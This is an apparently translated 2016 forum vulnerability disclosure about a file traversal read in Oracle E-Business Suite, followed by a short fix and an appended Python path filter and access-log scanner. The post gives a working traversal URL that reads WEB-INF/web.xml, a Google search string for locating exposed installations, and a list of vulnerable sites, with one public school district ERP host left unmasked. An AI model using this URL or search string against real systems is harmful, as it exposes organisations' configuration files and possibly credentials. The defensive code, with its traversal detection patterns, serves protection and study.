HanDs
Administrator

[July vulnerability disclosure] Oracle E-Business file traversal read vulnerability in a certain version






A certain version of Oracle E-Business has a file traversal read vulnerability

Detailed description:



During a scan, a file traversal read was found:



Code:
http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?





[screenshot: QQ图片20160409112930.png]





It turned out to be an Oracle system



[screenshot: QQ图片20160409113236.jpg]







Google hacking with the characteristic URL showed that a large number of sites abroad use this system

Code:
inurl:'OA_HTML/AppsLocalLogin.jsp'





[screenshot: QQ图片20160409113408.png]





Although some sites do filter the request and return HTTP 410, there is a high chance of reading the web.xml configuration file

[screenshot: QQ图片20160409113559.png]





Some vulnerable addresses:

Code:
http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://myerp.public.apsva.us/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

http://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

https://**.**.**.**.kw/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml?

Proof of vulnerability:


Fix:

Filter the requested path, and remove the help documentation
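The fix above amounts to filtering the path the help servlet is asked to serve. The following Python example is added here as an illustration; it is not code from the report, from the forum author, or from Oracle. It shows what such a filter has to do (decode repeatedly, strip the query string, normalize, check that the result stays under the document root, and refuse WEB-INF/META-INF outright), and, for operators who cannot patch immediately, how the same normalization can flag traversal attempts in web-server access logs. The application root path, the assumption that the servlet resolves its trailing path against that root, and the log lines are all constructed for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical document root of the web application (not from the report).
APP_ROOT = "/u01/app/OA_HTML"

# Directories a servlet container must never serve to clients.
PRIVATE_DIRS = {"WEB-INF", "META-INF"}


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_help_path(requested: str, app_root: str = APP_ROOT):
    """Map the trailing path of a help request onto a filesystem path under app_root.

    Returns the normalized absolute path when it is safe to serve, or None when the
    request would leave app_root or enter a container-private directory.
    Query strings and backslashes are removed before normalization so they cannot
    hide traversal segments.
    """
    path = fully_decode(requested).split("?", 1)[0].replace("\\", "/")
    root = posixpath.normpath(app_root)
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    # Containment check: the normalized path must stay inside the root.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    # Defence in depth: deployment descriptors are never served, even from inside the root.
    relative = candidate[len(root):].lstrip("/")
    if any(seg.upper() in PRIVATE_DIRS for seg in relative.split("/")):
        return None
    return candidate


# Minimal parser for Apache/OHS "combined" style access-log lines.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def is_traversal_attempt(log_line: str) -> bool:
    """True when the decoded request target climbs with '..' or names WEB-INF/META-INF."""
    m = LOG_LINE.match(log_line)
    if not m:
        return False
    target = fully_decode(m.group("target")).split("?", 1)[0].replace("\\", "/")
    segments = target.split("/")
    return ".." in segments or any(s.upper() in PRIVATE_DIRS for s in segments)


def scan_log(lines):
    """Return (ip, status, target) for every line that looks like a traversal attempt."""
    hits = []
    for line in lines:
        if is_traversal_attempt(line):
            m = LOG_LINE.match(line)
            hits.append((m.group("ip"), m.group("status"), m.group("target")))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jul/2016:10:02:11 +0800] "GET /OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml? HTTP/1.1" 200 5120',
    '198.51.100.4 - - [14/Jul/2016:10:02:30 +0800] "GET /OA_HTML/help/topics/iHelp/HelpServlet/US/po/index.htm HTTP/1.1" 200 812',
    '203.0.113.7 - - [14/Jul/2016:10:03:02 +0800] "GET /OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/..%2fWEB-INF/web.xml HTTP/1.1" 410 0',
]

if __name__ == "__main__":
    print(resolve_help_path("US/po/index.htm"))
    print(resolve_help_path("US/po/OA_HTML/cabo/../WEB-INF/web.xml?"))
    for hit in scan_log(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

The resolver returns None for the exact path shape in the report even though, after normalization, it still lies under the document root: the WEB-INF check catches it independently of the containment check, which is why both are kept. The log scan flags the encoded variant as well as the plain one, and it flags the request that the server already answered with 410, since a blocked attempt is still worth alerting on.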


Post #1
Posted: 2016-7-14   |   Views: 0   |   Replies: 0